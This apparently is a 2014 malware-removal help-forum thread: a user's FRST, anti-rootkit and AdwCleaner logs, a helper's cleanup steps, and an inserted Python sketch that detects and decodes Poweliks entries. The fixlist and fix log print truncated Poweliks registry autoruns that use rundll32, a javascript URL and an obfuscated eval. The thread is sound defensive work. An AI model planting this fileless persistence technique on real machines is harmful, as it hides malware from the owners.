    ==================== EXE Association (whitelisted) =============

    (If an entry is included in the fixlist, the default will be restored. None default entries will be removed.)


    ==================== MSCONFIG/TASK MANAGER disabled items =========

    (Currently there is no automatic fix for this section.)


    ========================= Accounts: ==========================

    Administrator (S-1-5-21-975400410-3068043782-3249626173-500 - Administrator - Enabled) => C:\Users\Administrator
    Guest (S-1-5-21-975400410-3068043782-3249626173-501 - Limited - Disabled)
    SophosSAUGLUSKID-LT0 (S-1-5-21-975400410-3068043782-3249626173-1006 - Limited - Enabled)

    ==================== Faulty Device Manager Devices =============

    Name: Cisco AnyConnect VPN Virtual Miniport Adapter for Windows x64
    Description: Cisco AnyConnect VPN Virtual Miniport Adapter for Windows x64
    Class Guid: {4d36e972-e325-11ce-bfc1-08002be10318}
    Manufacturer: Cisco Systems
    Service: vpnva
    Problem: : This device is disabled. (Code 22)
    Resolution: In Device Manager, click "Action", and then click "Enable Device". This starts the Enable Device wizard. Follow the instructions.


    ==================== Event log errors: =========================

    Application errors:
    ==================
    Error: (12/17/2014 10:09:07 AM) (Source: Sophos Message Router) (EventID: 8006) (User: NT AUTHORITY)
    Description: The network identity (also known as the Interoperable Object Reference or IOR) of the local computer is invalid.%%3

    Error: (12/17/2014 09:05:30 AM) (Source: Sophos Message Router) (EventID: 8006) (User: NT AUTHORITY)
    Description: The network identity (also known as the Interoperable Object Reference or IOR) of the local computer is invalid.%%3

    Error: (12/17/2014 08:59:58 AM) (Source: Sophos Message Router) (EventID: 8005) (User: NT AUTHORITY)
    Description: DNS lookup failure trying to resolve the following addresses: LN-CO-AVS01,LN-CO-AVS01.london.autodata.net.%%3

    Error: (12/17/2014 08:54:28 AM) (Source: WinMgmt) (EventID: 10) (User: )
    Description: //./root/CIMV2SELECT * FROM __InstanceModificationEvent WITHIN 60 WHERE TargetInstance ISA "Win32_Processor" AND TargetInstance.LoadPercentage > 990x80041003

    Error: (12/17/2014 08:35:39 AM) (Source: Sophos Message Router) (EventID: 8006) (User: NT AUTHORITY)
    Description: The network identity (also known as the Interoperable Object Reference or IOR) of the local computer is invalid.%%3

    Error: (12/17/2014 08:27:12 AM) (Source: Sophos Message Router) (EventID: 8006) (User: NT AUTHORITY)
    Description: The network identity (also known as the Interoperable Object Reference or IOR) of the local computer is invalid.%%3

    Error: (12/17/2014 04:50:55 AM) (Source: Sophos Message Router) (EventID: 8006) (User: NT AUTHORITY)
    Description: The network identity (also known as the Interoperable Object Reference or IOR) of the local computer is invalid.%%3

    Error: (12/16/2014 09:41:20 PM) (Source: Sophos Message Router) (EventID: 8006) (User: NT AUTHORITY)
    Description: The network identity (also known as the Interoperable Object Reference or IOR) of the local computer is invalid.%%3

    Error: (12/16/2014 09:31:20 PM) (Source: Application Error) (EventID: 1000) (User: )
    Description: Faulting application name: iexplore.exe, version: 11.0.9600.17041, time stamp: 0x4a5bc6b7
    Faulting module name: MSHTML.dll, version: 11.0.9600.17107, time stamp: 0x536855c9
    Exception code: 0xc00000fd
    Fault offset: 0x000b816f
    Faulting process id: 0x3cb8
    Faulting application start time: 0xiexplore.exe0
    Faulting application path: iexplore.exe1
    Faulting module path: iexplore.exe2
    Report Id: iexplore.exe3

    Error: (12/16/2014 07:13:45 PM) (Source: Sophos Message Router) (EventID: 8006) (User: NT AUTHORITY)
    Description: The network identity (also known as the Interoperable Object Reference or IOR) of the local computer is invalid.%%3


    System errors:
    =============
    Error: (12/17/2014 10:07:19 AM) (Source: Microsoft-Windows-DNS-Client) (EventID: 1012) (User: NT AUTHORITY)
    Description: There was an error while attempting to read the local hosts file.

    Error: (12/17/2014 08:59:41 AM) (Source: Service Control Manager) (EventID: 7022) (User: )
    Description: The Windows Update service hung on starting.

    Error: (12/17/2014 08:57:46 AM) (Source: TermService) (EventID: 1067) (User: )
    Description: The terminal server cannot register 'TERMSRV' Service Principal Name to be used for server authentication. The following error occured: The specified domain either does not exist or could not be contacted.
    .

    Error: (12/17/2014 08:55:38 AM) (Source: DCOM) (EventID: 10010) (User: )
    Description: {AB8902B4-09CA-4BB6-B78D-A8F59079A8D5}

    Error: (12/17/2014 08:54:31 AM) (Source: Microsoft-Windows-GroupPolicy) (EventID: 1129) (User: ADMS_NT)
    Description: The processing of Group Policy failed because of lack of network connectivity to a domain controller. This may be a transient condition. A success message would be generated once the machine gets connected to the domain controller and Group Policy has succesfully processed. If you do not see a success message for several hours, then contact your administrator.

    Error: (12/17/2014 08:53:33 AM) (Source: Microsoft-Windows-GroupPolicy) (EventID: 1055) (User: NT AUTHORITY)
    Description: The processing of Group Policy failed. Windows could not resolve the computer name. This could be caused by one of more of the following:
    a) Name Resolution failure on the current domain controller.
    b) Active Directory Replication Latency (an account created on another domain controller has not replicated to the current domain controller).

    Error: (12/17/2014 08:53:31 AM) (Source: NETLOGON) (EventID: 5719) (User: )
    Description: This computer was not able to set up a secure session with a domain
    controller in domain ADMS_NT due to the following:
    %%1311

    This may lead to authentication problems. Make sure that this
    computer is connected to the network. If the problem persists,
    please contact your domain administrator.



    ADDITIONAL INFO

    If this computer is a domain controller for the specified domain, it
    sets up the secure session to the primary domain controller emulator in the specified
    domain. Otherwise, this computer sets up the secure session to any domain controller
    in the specified domain.

    Error: (12/17/2014 07:47:53 AM) (Source: Ntfs) (EventID: 55) (User: )
    Description: The file system structure on the disk is corrupt and unusable.
    Please run the chkdsk utility on the volume OSDisk.

    Error: (12/17/2014 07:47:52 AM) (Source: Ntfs) (EventID: 55) (User: )
    Description: The file system structure on the disk is corrupt and unusable.
    Please run the chkdsk utility on the volume OSDisk.

    Error: (12/17/2014 07:47:51 AM) (Source: Ntfs) (EventID: 55) (User: )
    Description: The file system structure on the disk is corrupt and unusable.
    Please run the chkdsk utility on the volume OSDisk.


    Microsoft Office Sessions:
    =========================
    Error: (12/17/2014 10:09:07 AM) (Source: Sophos Message Router) (EventID: 8006) (User: NT AUTHORITY)
    Description:

    Error: (12/17/2014 09:05:30 AM) (Source: Sophos Message Router) (EventID: 8006) (User: NT AUTHORITY)
    Description:

    Error: (12/17/2014 08:59:58 AM) (Source: Sophos Message Router) (EventID: 8005) (User: NT AUTHORITY)
    Description: LN-CO-AVS01,LN-CO-AVS01.london.autodata.net

    Error: (12/17/2014 08:54:28 AM) (Source: WinMgmt) (EventID: 10) (User: )
    Description: //./root/CIMV2SELECT * FROM __InstanceModificationEvent WITHIN 60 WHERE TargetInstance ISA "Win32_Processor" AND TargetInstance.LoadPercentage > 990x80041003

    Error: (12/17/2014 08:35:39 AM) (Source: Sophos Message Router) (EventID: 8006) (User: NT AUTHORITY)
    Description:

    Error: (12/17/2014 08:27:12 AM) (Source: Sophos Message Router) (EventID: 8006) (User: NT AUTHORITY)
    Description:

    Error: (12/17/2014 04:50:55 AM) (Source: Sophos Message Router) (EventID: 8006) (User: NT AUTHORITY)
    Description:

    Error: (12/16/2014 09:41:20 PM) (Source: Sophos Message Router) (EventID: 8006) (User: NT AUTHORITY)
    Description:

    Error: (12/16/2014 09:31:20 PM) (Source: Application Error) (EventID: 1000) (User: )
    Description: iexplore.exe11.0.9600.170414a5bc6b7MSHTML.dll11.0.9600.17107536855c9c00000fd000b816f3cb801d019a0b5fc9a47C:\Program Files\Internet Explorer\iexplore.exeC:\windows\system32\MSHTML.dllc88588fa-8594-11e4-aa64-ac728900c61a

    Error: (12/16/2014 07:13:45 PM) (Source: Sophos Message Router) (EventID: 8006) (User: NT AUTHORITY)
    Description:


    ==================== Memory info ===========================

    Processor: Intel(R) Core(TM) i5-2410M CPU @ 2.30GHz
    Percentage of memory in use: 91%
    Total physical RAM: 4003.18 MB
    Available physical RAM: 331.73 MB
    Total Pagefile: 8676.54 MB
    Available Pagefile: 783 MB
    Total Virtual: 8192 MB
    Available Virtual: 8191.84 MB

    ==================== Drives ================================

    Drive c: (OSDisk) (Fixed) (Total:297.6 GB) (Free:202.88 GB) NTFS

    ==================== MBR & Partition Table ==================

    ========================================================
    Disk: 0 (MBR Code: Windows 7 or 8) (Size: 298.1 GB) (Disk ID: A47B9598)
    Partition 1: (Active) - (Size=499 MB) - (Type=07 NTFS)
    Partition 2: (Not Active) - (Size=297.6 GB) - (Type=07 NTFS)

    ==================== End Of Log ============================

  2. #2
    Security Expert-emeritus Juliet's Avatar
    Join Date
    Feb 2007
    Location
    Deep South
    Posts
    4,084

    Default

    Running from C:\Users\gluskid\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\2PB313KY



    We can't use FRST running from this directory.

    I'll post instructions on saving files to desktop, then I'll have you download Farbar Recovery Scan Tool again.


    - Save ALL Tools to your Desktop-

    All tools that I have you download should be placed on the desktop unless otherwise stated. If you are familiar with how to save files to the desktop then you can skip this step.

    Since you are continuing with this step then I assume you are unfamiliar with saving files to your desktop. As a result it's easiest if you configure your browser(s) to download any tools to the desktop by default. Please use the appropriate instructions below depending on the browser you are using.
    Google Chrome - Click the "Customize and control Google Chrome" button in the upper-right corner of the browser. Choose Settings. At the bottom of the screen click the "Show advanced settings..." link. Scroll down to find the Downloads section and click the Change... button. Select your desktop and click OK.
    Mozilla Firefox - Click the "Open Menu" button in the upper-right corner of the browser. Choose Options. In the downloads section, click the Browse button, click on the Desktop folder and then click the "Select Folder" button. Click OK to get out of the Options menu.
    Internet Explorer - Click the Tools menu in the upper-right corner of the browser. Select View downloads. Select the Options link in the lower left of the window. Click Browse and select the Desktop and then choose the Select Folder button. Click OK to get out of the download options screen and then click Close to get out of the View Downloads screen.
    NOTE: IE8 Does not support changing download locations in this manner. You will need to download the tool(s) to the default folder, usually Downloads, then copy them to the desktop.

    ~~~~~~~~~~~~

    Farbar Recovery Scan Tool (FRST) Scan


    Don't do anything. I need it on desktop to run the fix.

    ~~~~~~~~~~~~~~~~



    Open notepad. Please copy the contents of the quote box below. To do this highlight the contents of the box and right click on it and select copy.
    Paste this into the open notepad. save it to the Desktop as fixlist.txt
    NOTE. It's important that both files, FRST/FRST64 and fixlist.txt are in the same location or the fix will not work.
    It needs to be saved Next to the "Farbar Recovery Scan Tool" (If asked to overwrite existing one please allow)

    start
    CloseProcesses:
    HKU\S-1-5-21-2118340153-1145135853-813105556-21214\...\Policies\Explorer: [DisallowRun] 1
    HKU\S-1-5-21-2118340153-1145135853-813105556-21214\...A8F59079A8D5}\localserver32: rundll32.exe javascript:"\..\mshtml.dll,RunHTMLApplication ";eval("epdvnfou/xsjuf)(=tdsjqu!mbohvbhf> (the data entry has 243 more characters). <==== Poweliks!
    HKLM\SOFTWARE\Policies\Microsoft\Internet Explorer: Policy restriction <======= ATTENTION
    BHO: Java(tm) Plug-In SSV Helper -> {761497BB-D6F0-462C-B6EB-D4DAF1D92D43} -> C:\Program Files\Java\jre1.8.0_25\bin\ssv.dll (Oracle Corporation)
    BHO: Java(tm) Plug-In 2 SSV Helper -> {DBC80044-A445-435b-BC74-9C25C1C588A9} -> C:\Program Files\Java\jre1.8.0_25\bin\jp2ssv.dll (Oracle Corporation)
    CustomCLSID: HKU\S-1-5-21-2118340153-1145135853-813105556-21214_Classes\CLSID\{AB8902B4-09CA-4bb6-B78D-A8F59079A8D5}\localserver32 -> rundll32.exe javascript:"\..\mshtml.dll,RunHTMLApplication ";eval("epdvnfou/xsjuf)(=tdsjqu!mbohvbhf> (the data entry has 251 more characters). <==== Poweliks?
    EmptyTemp:
    Hosts:
    End
    Open FRST/FRST64 and press the Fix button just once and wait.
    If for some reason the tool needs a restart, please make sure you let the system restart normally. After that let the tool complete its run.
    When finished FRST will generate a log on the Desktop (Fixlog.txt). Please post it to your reply.

    ~~~~~~~~~~~~~~~~~~~~~~~~~

    Malwarebytes Anti-Rootkit
    • Download Malwarebytes Anti-Rootkit
    • Once the file has been downloaded, right click on the downloaded file and select the Extract all menu option.
    • Follow the instructions to extract the ZIP file to a folder called mbar-versionnumber on your desktop.
    • Once the ZIP file has been extracted, open the folder and when that folder opens, double-click on the mbar folder.
    • Double-click on the mbar.exe file to launch Malwarebytes Anti-Rootkit.
    • After you double-click on the mbar.exe file, you may receive a User Account Control (UAC) message asking if you are sure you wish to allow the program to run. Please allow it so that Malwarebytes Anti-Rootkit can start correctly.
    • Malwarebytes Anti-Rootkit will now install necessary drivers that are required for the program to operate correctly.
    • If you receive a DDA driver message like could not load DDA driver, click on the Yes button and Malwarebytes Anti-Rootkit will now restart your computer and will start automatically.
    • On the introduction screen, please click on the Next button to continue.
    • Next you will see the Update Database screen.
    • Click on the Update button so Malwarebytes Anti-Rootkit can download the latest definition updates.
    • When the update has finished, click on the Next button.
    • Next you can select some basic scanning options. Make sure the Drivers, Sectors, and System scan targets are selected before you click on the Scan button.
    • Malwarebytes Anti-Rootkit will now start scanning your computer for rootkits. This scan can take some time, so please be patient.
    • When the scan with Malwarebytes Anti-Rootkit is finished, the program will display a screen with the results from the scan.
    • Make sure everything is selected and that the option to create a restore point is checked.
    • Next click on the Cleanup button. Malwarebytes Anti-Rootkit will then prompt you to reboot your computer.
    • Click on the Yes button to restart your computer.

    • There will now be two log files created in the mbar folder called system-log.txt and one that starts with mbar-log.
    • The mbar-log file will always start with mbar-log, but the rest will be named using a timestamp indicating the time it was run.
      • For example, mbar-log-2012-11-12 (19-13-32).txt corresponds to mbar-log-year-month-day (hour-minute-second).txt.

    • The system-log.txt contains information about each time you have run MBAR and contains diagnostic information from the program.



    Please post
    Fixlog.txt
    Malwarebytes Anti-Rootkit log
    Last edited by Juliet; 2014-12-18 at 12:48. Reason: typo
    Windows Insider MVP Consumer Security 2009 - 2017
    Please do not PM me for Malware help, we all benefit from posting on the open board.
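The two entries flagged as Poweliks in the fixlist above share one shape: a COM server value (`localserver32`) whose data launches `rundll32.exe` with a `javascript:` URL and the `mshtml.dll,RunHTMLApplication` entry point, followed by an `eval()` of text whose characters are each shifted up by one. The following detection sketch is an added example, not part of the original posts and not FRST's own logic; the sample log is constructed, its SID, CLSIDs and paths are placeholders, and the function names are hypothetical.

```python
import re

# Constructed sample input, modelled on the FRST lines quoted in this thread.
# SID, CLSIDs and program paths are placeholders; the eval() fragment is the
# truncated one visible in the fixlist above.
SAMPLE_LOG = r'''
HKLM\...\Run: [ExampleApp] => C:\Program Files\Example\app.exe
BHO: Example Helper -> {00000000-0000-0000-0000-000000000001} -> C:\Program Files\Example\helper.dll (Example Corp.)
CustomCLSID: HKU\S-1-5-21-0-0-0-1000_Classes\CLSID\{00000000-0000-0000-0000-000000000002}\localserver32 -> rundll32.exe javascript:"\..\mshtml.dll,RunHTMLApplication ";eval("epdvnfou/xsjuf)(=tdsjqu!mbohvbhf> (the data entry has 251 more characters).
CustomCLSID: HKU\S-1-5-21-0-0-0-1000_Classes\CLSID\{00000000-0000-0000-0000-000000000003}\InprocServer32 -> C:\Users\user\AppData\Local\Example\shellext.dll (Example Corp.)
'''

# rundll32 handed a javascript: URL instead of a DLL path.
SCRIPT_HOST = re.compile(r'rundll32(?:\.exe)?\s+javascript:', re.I)
# The mshtml export named in the flagged registry data.
HTML_APP = re.compile(r'mshtml(?:\.dll)?\s*,\s*RunHTMLApplication', re.I)
# COM server subkeys, which run whenever the CLSID is instantiated.
COM_SERVER = re.compile(r'\\(?:localserver32|inprocserver32)\b', re.I)
# First argument of eval(), up to the point where the log truncates it.
EVAL_ARG = re.compile(r'eval\("([^"\s]+)')
SCRIPT_MARKERS = ("document.write", "<script")


def shift_decode(text, delta=-1):
    """Shift every character code by delta (the fragment above is shifted by +1)."""
    return "".join(chr(max(ord(ch) + delta, 0)) for ch in text)


def analyse_line(line):
    """Return a finding dict for a suspicious registry line, or None."""
    host = SCRIPT_HOST.search(line)
    if not host:
        return None
    finding = {
        # Everything before the command is the registry location FRST printed.
        "location": line[:host.start()].rstrip(" ->:"),
        "run_html_application": bool(HTML_APP.search(line)),
        "com_server": bool(COM_SERVER.search(line)),
        "decoded": None,
    }
    arg = EVAL_ARG.search(line)
    if arg:
        candidate = shift_decode(arg.group(1))
        # Keep the decoding only if it reads as script, so an unrelated
        # eval() argument is not reported as a successful decode.
        if any(marker in candidate.lower() for marker in SCRIPT_MARKERS):
            finding["decoded"] = candidate
    return finding


def scan(log_text):
    """Analyse every non-empty line of a log and return the findings."""
    findings = []
    for line in log_text.splitlines():
        result = analyse_line(line.strip())
        if result:
            findings.append(result)
    return findings


if __name__ == "__main__":
    for hit in scan(SAMPLE_LOG):
        print(hit["location"])
        print("  RunHTMLApplication:", hit["run_html_application"])
        print("  COM server key:   ", hit["com_server"])
        print("  decoded fragment: ", hit["decoded"])
```

Only the fragment visible in the log is decoded, so the output is a prefix of the stored script; the remaining characters are truncated by the log itself.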

  3. #3
    Junior Member
    Join Date
    Dec 2014
    Posts
    6

    Default results

    Thanks for your help so far, here are the logs:

    Fix result of Farbar Recovery Tool (FRST written by Farbar) (x64) Version: 17-12-2014
    Ran by gluskid at 2014-12-18 07:41:33 Run:1
    Running from C:\Users\gluskid\Desktop
    Loaded Profiles: gluskid & Administrator (Available profiles: gluskid & Administrator)
    Boot Mode: Normal
    ==============================================

    Content of fixlist:
    *****************
    start
    CloseProcesses:
    HKU\S-1-5-21-2118340153-1145135853-813105556-21214\...\Policies\Explorer: [DisallowRun] 1
    HKU\S-1-5-21-2118340153-1145135853-813105556-21214\...A8F59079A8D5}\localserver32: rundll32.exe javascript:"\..\mshtml.dll,RunHTMLApplication ";eval("epdvnfou/xsjuf)(=tdsjqu!mbohvbhf> (the data entry has 243 more characters). <==== Poweliks!
    HKLM\SOFTWARE\Policies\Microsoft\Internet Explorer: Policy restriction <======= ATTENTION
    BHO: Java(tm) Plug-In SSV Helper -> {761497BB-D6F0-462C-B6EB-D4DAF1D92D43} -> C:\Program Files\Java\jre1.8.0_25\bin\ssv.dll (Oracle Corporation)
    BHO: Java(tm) Plug-In 2 SSV Helper -> {DBC80044-A445-435b-BC74-9C25C1C588A9} -> C:\Program Files\Java\jre1.8.0_25\bin\jp2ssv.dll (Oracle Corporation)
    CustomCLSID: HKU\S-1-5-21-2118340153-1145135853-813105556-21214_Classes\CLSID\{AB8902B4-09CA-4bb6-B78D-A8F59079A8D5}\localserver32 -> rundll32.exe javascript:"\..\mshtml.dll,RunHTMLApplication ";eval("epdvnfou/xsjuf)(=tdsjqu!mbohvbhf> (the data entry has 251 more characters). <==== Poweliks?
    EmptyTemp:
    Hosts:
    End
    *****************

    Processes closed successfully.
    HKU\S-1-5-21-2118340153-1145135853-813105556-21214\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\\DisallowRun => value deleted successfully.
    "HKU\S-1-5-21-2118340153-1145135853-813105556-21214\Software\Classes\CLSID\{AB8902B4-09CA-4bb6-B78D-A8F59079A8D5}\localserver32" => Key Deleted Successfully.
    "HKU\S-1-5-21-2118340153-1145135853-813105556-21214\Software\Classes\CLSID\{AB8902B4-09CA-4bb6-B78D-A8F59079A8D5}" => Key deleted successfully.
    "HKLM\SOFTWARE\Policies\Microsoft\Internet Explorer" => Key deleted successfully.
    "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper Objects\{761497BB-D6F0-462C-B6EB-D4DAF1D92D43}" => Key deleted successfully.
    "HKCR\CLSID\{761497BB-D6F0-462C-B6EB-D4DAF1D92D43}" => Key deleted successfully.
    "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper Objects\{DBC80044-A445-435b-BC74-9C25C1C588A9}" => Key deleted successfully.
    "HKCR\CLSID\{DBC80044-A445-435b-BC74-9C25C1C588A9}" => Key deleted successfully.
    "HKU\S-1-5-21-2118340153-1145135853-813105556-21214_Classes\CLSID\{AB8902B4-09CA-4bb6-B78D-A8F59079A8D5}" => Key not found.
    C:\Windows\System32\Drivers\etc\hosts => Moved successfully.
    Hosts was reset successfully.
    EmptyTemp: => Removed 2.3 GB temporary data.


    The system needed a reboot.

    ==== End of Fixlog ====

    Malwarebytes Anti-Rootkit BETA 1.08.2.1001
    www.malwarebytes.org

    Database version: v2014.12.18.02

    Windows 7 Service Pack 1 x64 NTFS
    Internet Explorer 11.0.9600.17107
    gluskid :: GLUSKID-LT [administrator]

    12/18/2014 9:15:48 AM
    mbar-log-2014-12-18 (09-15-48).txt

    Scan type: Quick scan
    Scan options enabled: Anti-Rootkit | Drivers | MBR | Physical Sectors | Memory | Startup | Registry | File System | Heuristics/Extra | Heuristics/Shuriken
    Scan options disabled:
    Objects scanned: 404243
    Time elapsed: 17 minute(s), 50 second(s)

    Memory Processes Detected: 0
    (No malicious items detected)

    Memory Modules Detected: 0
    (No malicious items detected)

    Registry Keys Detected: 0
    (No malicious items detected)

    Registry Values Detected: 0
    (No malicious items detected)

    Registry Data Items Detected: 0
    (No malicious items detected)

    Folders Detected: 0
    (No malicious items detected)

    Files Detected: 0
    (No malicious items detected)

    Physical Sectors Detected: 0
    (No malicious items detected)

    (end)


    Malwarebytes Anti-Rootkit BETA 1.08.2.1001

    (c) Malwarebytes Corporation 2011-2012

    OS version: 6.1.7601 Windows 7 Service Pack 1 x64

    Account is Administrative

    Internet Explorer version: 11.0.9600.17107

    File system is: NTFS
    Disk drives: C:\ DRIVE_FIXED
    CPU speed: 2.294000 GHz
    Memory total: 4197638144, free: 2413350912

    =======================================


    ---------------------------------------
    Malwarebytes Anti-Rootkit BETA 1.08.2.1001

    (c) Malwarebytes Corporation 2011-2012

    OS version: 6.1.7601 Windows 7 Service Pack 1 x64

    Account is Administrative

    Internet Explorer version: 11.0.9600.17107

    File system is: NTFS
    Disk drives: C:\ DRIVE_FIXED
    CPU speed: 2.294000 GHz
    Memory total: 4197638144, free: 2422587392

    ---------------------------------------
    Malwarebytes Anti-Rootkit BETA 1.08.2.1001

    (c) Malwarebytes Corporation 2011-2012

    OS version: 6.1.7601 Windows 7 Service Pack 1 x64

    Account is Administrative

    Internet Explorer version: 11.0.9600.17107

    File system is: NTFS
    Disk drives: C:\ DRIVE_FIXED
    CPU speed: 2.294000 GHz
    Memory total: 4197638144, free: 2438320128

    Downloaded database version: v2014.12.18.02
    Downloaded database version: v2014.12.14.01
    Downloaded database version: v2014.12.06.01
    =======================================
    Initializing...
    This version of Malwarebytes Anti-Rootkit requires you to completely exit the Malwarebytes Anti-Malware application to continue.
    =======================================
    Initializing...
    ------------ Kernel report ------------
    12/18/2014 09:15:27
    ------------ Loaded modules -----------
    ----------- End -----------
    Done!
    <<<1>>>
    Upper Device Name: \Device\Harddisk1\DR1
    Upper Device Object: 0xfffffa8006da2300
    Upper Device Driver Name: \Driver\Disk\
    Lower Device Name: \Device\0000008d\
    Lower Device Object: 0xfffffa8006dabb60
    Lower Device Driver Name: \Driver\USBSTOR\
    <<<1>>>
    Upper Device Name: \Device\Harddisk0\DR0
    Upper Device Object: 0xfffffa80046f4060
    Upper Device Driver Name: \Driver\Disk\
    Lower Device Name: \Device\00000062\
    Lower Device Object: 0xfffffa80046b19c0
    Lower Device Driver Name: \Driver\iaStorA\
    <<<2>>>
    Physical Sector Size: 512
    Drive: 0, DevicePointer: 0xfffffa80046f4060, DeviceName: \Device\Harddisk0\DR0\, DriverName: \Driver\Disk\
    --------- Disk Stack ------
    DevicePointer: 0xfffffa80046f4b90, DeviceName: Unknown, DriverName: \Driver\partmgr\
    DevicePointer: 0xfffffa80046f4060, DeviceName: \Device\Harddisk0\DR0\, DriverName: \Driver\Disk\
    DevicePointer: 0xfffffa80045edc20, DeviceName: Unknown, DriverName: \Driver\stdcfltn\
    DevicePointer: 0xfffffa80045ec950, DeviceName: Unknown, DriverName: \Driver\iaStorF\
    DevicePointer: 0xfffffa80046b8e40, DeviceName: Unknown, DriverName: \Driver\ACPI\
    DevicePointer: 0xfffffa80046b19c0, DeviceName: \Device\00000062\, DriverName: \Driver\iaStorA\
    ------------ End ----------
    Alternate DeviceName: \Device\Harddisk0\DR0\, DriverName: \Driver\Disk\
    Upper DeviceData: 0x0, 0x0, 0x0
    Lower DeviceData: 0x0, 0x0, 0x0
    <<<3>>>
    Volume: C:
    File system type: NTFS
    SectorSize = 512, ClusterSize = 4096, MFTRecordSize = 1024, MFTIndexSize = 4096 bytes
    <<<2>>>
    <<<3>>>
    Volume: C:
    File system type: NTFS
    SectorSize = 512, ClusterSize = 4096, MFTRecordSize = 1024, MFTIndexSize = 4096 bytes
    Scanning drivers directory: C:\WINDOWS\SYSTEM32\drivers...
    Done!
    Drive 0
    This is a System drive
    Scanning MBR on drive 0...
    Inspecting partition table:
    MBR Signature: 55AA
    Disk Signature: A47B9598

    Partition information:

    Partition 0 type is Primary (0x7)
    Partition is ACTIVE.
    Partition starts at LBA: 2048 Numsec = 1021952
    Partition file system is NTFS
    Partition is bootable

    Partition 1 type is Primary (0x7)
    Partition is NOT ACTIVE.
    Partition starts at LBA: 1024000 Numsec = 624115712

    Partition 2 type is Empty (0x0)
    Partition is NOT ACTIVE.
    Partition starts at LBA: 0 Numsec = 0

    Partition 3 type is Empty (0x0)
    Partition is NOT ACTIVE.
    Partition starts at LBA: 0 Numsec = 0

    Disk Size: 320072933376 bytes
    Sector size: 512 bytes

    Done!
    Physical Sector Size: 0
    Drive: 1, DevicePointer: 0xfffffa8006da2300, DeviceName: \Device\Harddisk1\DR1\, DriverName: \Driver\Disk\
    --------- Disk Stack ------
    DevicePointer: 0xfffffa8007b06040, DeviceName: Unknown, DriverName: \Driver\partmgr\
    DevicePointer: 0xfffffa8006da2300, DeviceName: \Device\Harddisk1\DR1\, DriverName: \Driver\Disk\
    DevicePointer: 0xfffffa8006c6e040, DeviceName: Unknown, DriverName: \Driver\iaStorF\
    DevicePointer: 0xfffffa8006dabb60, DeviceName: \Device\0000008d\, DriverName: \Driver\USBSTOR\
    ------------ End ----------
    Scan finished
    =======================================


    Removal queue found; removal started
    Removing C:\ProgramData\Malwarebytes' Anti-Malware (portable)\MBR-0-i.mbam...
    Removing C:\ProgramData\Malwarebytes' Anti-Malware (portable)\VBR-0-0-2048-i.mbam...
    Removing C:\ProgramData\Malwarebytes' Anti-Malware (portable)\MBR-0-r.mbam...
    Removal finished

  4. #4
    Security Expert-emeritus Juliet's Avatar
    Join Date
    Feb 2007
    Location
    Deep South
    Posts
    4,084

    Default

    OK, looks good.

    -AdwCleaner-by Xplode

    Click on this link to download : ADWCleaner
    Click on ONE of the two blue Download Now buttons that have a blue arrow beside them and save it to your desktop.

    Do not click on any links in the top Advertisement.



    • Close all open programs and internet browsers.
    • Double click on AdwCleaner.exe to run the tool.
    • Click on Scan.
    • After the scan is complete click on "Clean"
    • Confirm each time with Ok.
    • Your computer will be rebooted automatically. A text file will open after the restart.
    • Please post the content of that logfile with your next answer.
    • You can find the logfile at C:\AdwCleaner[S1].txt as well.
    • NOTE: If you see AVG Secure Search being targeted for deletion, Here's Why and Here. You can always Reinstall it.

    ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~



    Please download Junkware Removal Tool to your desktop.
    • Shut down your protection software now to avoid potential conflicts.
    • Run the tool by double-clicking it. If you are using Windows Vista, 7, or 8; instead of double-clicking, right-mouse click JRT.exe and select "Run as Administrator".
    • The tool will open and start scanning your system.
    • Please be patient as this can take a while to complete depending on your system's specifications.
    • On completion, a log (JRT.txt) is saved to your desktop and will automatically open.
    • Post the contents of JRT.txt into your next message.


    ~~~~~~~~~~

    Download Malwarebytes' Anti-Malware to your desktop.

    • Windows XP : Double click on the icon to run it.
    • Windows Vista, Windows 7 & 8 : Right click and select "Run as Administrator"

    • On the Dashboard click on Update Now
    • Go to the Settings tab
    • Under Settings go to Detection and Protection
    • Under PUP and PUM make sure both are set to show Treat Detections as Malware
    • Go to Advanced Settings and make sure Automatically Quarantine Detected Items is checked
    • Then on the Dashboard click on Scan
    • Make sure to select THREAT SCAN
    • Then click on Scan
    • When the scan is finished and the log pops up...select Copy to Clipboard
    • Please paste the log back into this thread for review
    • Exit Malwarebytes



    please post
    C:\AdwCleaner.txt
    JRT.txt
    MBAM log


    How is the computer now?

  5. #5
    Junior Member
    Join Date
    Dec 2014
    Posts
    6

    Default running good now

    Thanks again for your help. The logs:

    # AdwCleaner v4.105 - Report created 18/12/2014 at 15:10:42
    # Updated 08/12/2014 by Xplode
    # Database : 2014-12-16.1 [Live]
    # Operating System : Windows 7 Professional Service Pack 1 (64 bits)
    # Username : gluskid - GLUSKID-LT
    # Running from : C:\Users\gluskid\Desktop\AdwCleaner.exe
    # Option : Clean

    ***** [ Services ] *****


    ***** [ Files / Folders ] *****


    ***** [ Scheduled Tasks ] *****


    ***** [ Shortcuts ] *****


    ***** [ Registry ] *****

    Key Deleted : [x64] HKCU\Software\Microsoft\Internet Explorer\SearchScopes\{0633EE93-D776-472F-A0FF-E1416B8B2E3A}
    Key Deleted : [x64] HKLM\SOFTWARE\Microsoft\Internet Explorer\SearchScopes\{0633EE93-D776-472F-A0FF-E1416B8B2E3A}

    ***** [ Browsers ] *****

    -\\ Internet Explorer v11.0.9600.17041


    -\\ Mozilla Firefox v32.0 (x86 en-US)


    -\\ Google Chrome v39.0.2171.95

    [C:\Users\gluskid\AppData\Local\Google\Chrome\User Data\Default\Web Data] - Deleted [Search Provider] : hxxp://search.aol.com/aol/search?q={searchTerms}
    [C:\Users\gluskid\AppData\Local\Google\Chrome\User Data\Default\Web Data] - Deleted [Search Provider] : hxxp://www.ask.com/web?q={searchTerms}

    *************************

    AdwCleaner[R0].txt - [1315 octets] - [18/12/2014 15:05:22]
    AdwCleaner[S0].txt - [1236 octets] - [18/12/2014 15:10:42]

    ########## EOF - C:\AdwCleaner\AdwCleaner[S0].txt - [1296 octets] ##########


    ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
    Junkware Removal Tool (JRT) by Thisisu
    Version: 6.4.0 (11.29.2014:1)
